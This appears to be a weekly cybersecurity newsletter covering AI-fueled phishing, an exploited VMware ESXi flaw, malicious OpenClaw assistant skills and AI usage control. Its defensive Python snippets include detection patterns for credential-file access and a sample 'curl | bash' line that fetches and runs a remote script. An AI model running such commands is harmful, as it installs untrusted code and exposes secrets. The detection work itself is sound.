**Weekly Cybersecurity Roundup for the Week of February 6, 2026**
This week’s security roundup spotlights how AI is turbocharging the threat landscape: phishing volumes have more than doubled as attackers weaponize polymorphic campaigns and local-language lures. CISA also confirmed active ransomware exploitation of a critical VMware ESXi sandbox-escape vulnerability, adding urgency for organizations with lagging patch programs. Researchers uncovered hundreds of malicious “skills” in the OpenClaw AI assistant ecosystem that distribute password stealers to Windows and macOS users. We close with a practical buyer’s guide to AI usage control to help teams rein in shadow AI, protect sensitive data, and stay compliant.
AI Drives Doubling of Phishing Attacks in a Year
A new report from Cofense reveals that the volume of phishing attacks has more than doubled in the last year, driven largely by the widespread adoption of artificial intelligence by cybercriminals.
In 2025, security filters detected a phishing email every 19 seconds, a significant jump from one every 42 seconds in 2024. Threat actors now use AI as a core capability to create “polymorphic” campaigns that dynamically alter logos, wording, and URLs to evade detection, and to generate near-flawless emails in local languages. The report also notes a 105% surge in the use of Remote Access Trojans (RATs) and a rise in “conversational” phishing attacks, which bypass traditional filters by omitting malicious links and attachments entirely.
This rapid evolution of AI-enhanced threats underscores the critical need for organizations to move beyond static perimeter defenses and adopt behavioral analysis and human validation strategies to identify these increasingly sophisticated attacks.
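To make the “behavioral analysis” point concrete: when a lure contains no link or attachment, a filter has nothing to detonate or blocklist, so detection must weigh intent cues instead. The sketch below is a hypothetical illustration of that idea; the keyword lists and score weights are invented for this example and are not taken from the Cofense report.

```python
import re

# Invented cue list for illustration -- real systems use far richer features
# (sender history, reply-chain context, display-name spoofing, etc.).
URGENCY_CUES = re.compile(
    r"\b(urgent|immediately|right away|are you available|quick favor|gift cards?)\b",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)

def conversational_phish_score(body: str, sender_is_known: bool) -> float:
    """Return a rough 0..1 suspicion score for a link-free 'conversational' lure."""
    score = 0.0
    if not URL_PATTERN.search(body):
        # No URL to scan or blocklist -- the classic conversational-lure setup.
        score += 0.3
    # Count distinct urgency/reply-bait phrases in the message body.
    score += 0.2 * len(set(URGENCY_CUES.findall(body.lower())))
    if not sender_is_known:
        score += 0.3
    return min(score, 1.0)

print(conversational_phish_score(
    "Are you available? I need a quick favor with gift cards, please reply immediately.",
    sender_is_known=False,
))  # → 1.0
```

A benign message with a link from a known sender scores 0.0 under the same rules, which is exactly why attackers who strip out links force defenders toward this kind of behavioral signal.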
Read the original article here
CISA: VMware ESXi Flaw Now Exploited in Ransomware Attacks
Summary
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that ransomware gangs are actively exploiting a critical sandbox escape vulnerability in VMware ESXi systems.
Key Points
- The vulnerability (CVE-2025-22225) allows attackers with specific privileges to execute an arbitrary kernel write, enabling them to escape the virtual machine sandbox and compromise the host system.
- Although Broadcom released a patch for this flaw in March 2025, investigations suggest threat actors may have been exploiting it as a zero-day vulnerability as far back as February 2024.
- CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog and ordered federal agencies to secure their systems by late March 2025 to prevent further compromise.
Why It Matters
Because VMware ESXi is widely used in enterprise environments to host critical servers and data, this active exploitation represents a severe risk for organizations that have not yet applied the available patches, potentially leading to widespread ransomware infections.
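For teams triaging exposure, the decisive question is whether each host’s build number predates the fixed release. The helper below is a minimal sketch of that check; the `PATCHED_MIN_BUILD` value is a placeholder assumption, so take the authoritative fixed build numbers for CVE-2025-22225 from Broadcom’s advisory (VMSA-2025-0004) before relying on anything like this.

```python
# PLACEHOLDER build threshold -- replace with the real fixed build for your
# ESXi release line from Broadcom advisory VMSA-2025-0004.
PATCHED_MIN_BUILD = 24585300

def needs_patch(esxcli_version_output: str,
                patched_min_build: int = PATCHED_MIN_BUILD) -> bool:
    """Parse `esxcli system version get` output and flag pre-patch builds."""
    for line in esxcli_version_output.splitlines():
        key, _, value = line.strip().partition(":")
        if key.strip().lower() == "build":
            # Build values look like "Releasebuild-24280767".
            build = int(value.strip().rsplit("-", 1)[-1])
            return build < patched_min_build
    raise ValueError("no Build line found in esxcli output")

sample = """\
   Product: VMware ESXi
   Version: 8.0.3
   Build: Releasebuild-24280767
   Update: 3
"""
print(needs_patch(sample))  # → True (this build predates the placeholder threshold)
```

Running this against `esxcli system version get` output collected from each host gives a quick inventory of which machines are still exposed.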
Read the original article here
Malicious Skills in OpenClaw AI Assistant Distribute Malware
Summary
Security researchers have discovered over 230 malicious “skills” (plugins) uploaded to the official registry of the OpenClaw AI assistant (formerly Moltbot) that are designed to distribute password-stealing malware. These malicious packages disguise themselves as legitimate financial or cryptocurrency tools but actually contain a malware delivery mechanism known as “AuthTool.” When users install and follow the documentation for these skills, they inadvertently download stealers capable of extracting sensitive data such as API keys, SSH credentials, and browser passwords on both Windows and macOS systems.
Why It Matters
This campaign demonstrates the growing risk associated with the open-source AI ecosystem, where unvetted third-party extensions can easily compromise the security of users who grant these assistants deep system access.
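One practical takeaway is to statically vet a skill’s install instructions before running them. The checks below are generic red flags sketched for illustration; they are hypothetical and are not the specific indicators researchers used to identify the “AuthTool” delivery chain.

```python
import re

# Invented red-flag patterns commonly associated with malicious install docs:
# piping a remote script to a shell, decoding hidden payloads, and touching
# credential stores that a "financial tool" has no business reading.
RISKY_PATTERNS = {
    "pipe-to-shell install": re.compile(r"curl[^\n|]*\|\s*(ba)?sh"),
    "encoded payload": re.compile(r"base64\s+(-d|--decode)"),
    "credential path access": re.compile(r"(\.ssh/|\.aws/credentials|Login Data)"),
}

def audit_skill_docs(text: str) -> list[str]:
    """Return the names of red-flag patterns found in a skill's install docs."""
    return [name for name, pat in RISKY_PATTERNS.items() if pat.search(text)]

docs = "To activate, run: curl -s https://example.invalid/setup | bash"
print(audit_skill_docs(docs))  # → ['pipe-to-shell install']
```

A hit from a scan like this is not proof of malice, but it is a strong reason to withhold the deep system access these assistants are typically granted until the skill has been reviewed.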
Read the original article here
A Buyer’s Guide to Navigating AI Usage Control
As organizations increasingly adopt generative AI, controlling its usage has become a critical security priority to prevent data leakage and ensure compliance. This guide outlines essential strategies for managing AI risks, such as implementing visibility tools to track shadow AI usage and enforcing policies that restrict sensitive data from being shared with public AI models. It emphasizes the importance of a comprehensive approach that includes discovering all AI applications in use, assessing their risk levels, and applying granular controls based on user roles and data sensitivity.
By adopting these measures, businesses can safely leverage the productivity benefits of AI while protecting their intellectual property and adhering to regulatory standards.
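The “granular controls based on user roles and data sensitivity” idea can be sketched as a simple gateway rule that decides whether a prompt may leave for a given AI destination. Everything in this example is an assumption for illustration: the role names, the sanctioned-model allowlist, and the sensitive-data patterns would all come from your own policy.

```python
import re
from dataclasses import dataclass

# Invented sensitive-data patterns (an API-key shape and a US SSN shape).
SENSITIVE = {
    "api key": re.compile(r"\b(sk-[A-Za-z0-9]{20,}|AKIA[0-9A-Z]{16})\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}
# Shadow AI, in this sketch, is any destination not on the sanctioned list.
SANCTIONED_MODELS = {"internal-llm"}

@dataclass
class Verdict:
    allowed: bool
    reason: str

def check_prompt(role: str, destination: str, prompt: str) -> Verdict:
    """Apply destination allowlisting, then role-aware sensitive-data checks."""
    if destination not in SANCTIONED_MODELS:
        return Verdict(False, f"unsanctioned AI destination: {destination}")
    hits = [name for name, pat in SENSITIVE.items() if pat.search(prompt)]
    if hits and role != "security-reviewer":
        return Verdict(False, f"sensitive data for role {role}: {', '.join(hits)}")
    return Verdict(True, "ok")

print(check_prompt("engineer", "public-chatbot", "summarize this doc"))
```

The ordering matters: discovery and allowlisting catch shadow AI outright, while the data-sensitivity check applies role-based nuance to the tools you do sanction, mirroring the discover/assess/control sequence the guide recommends.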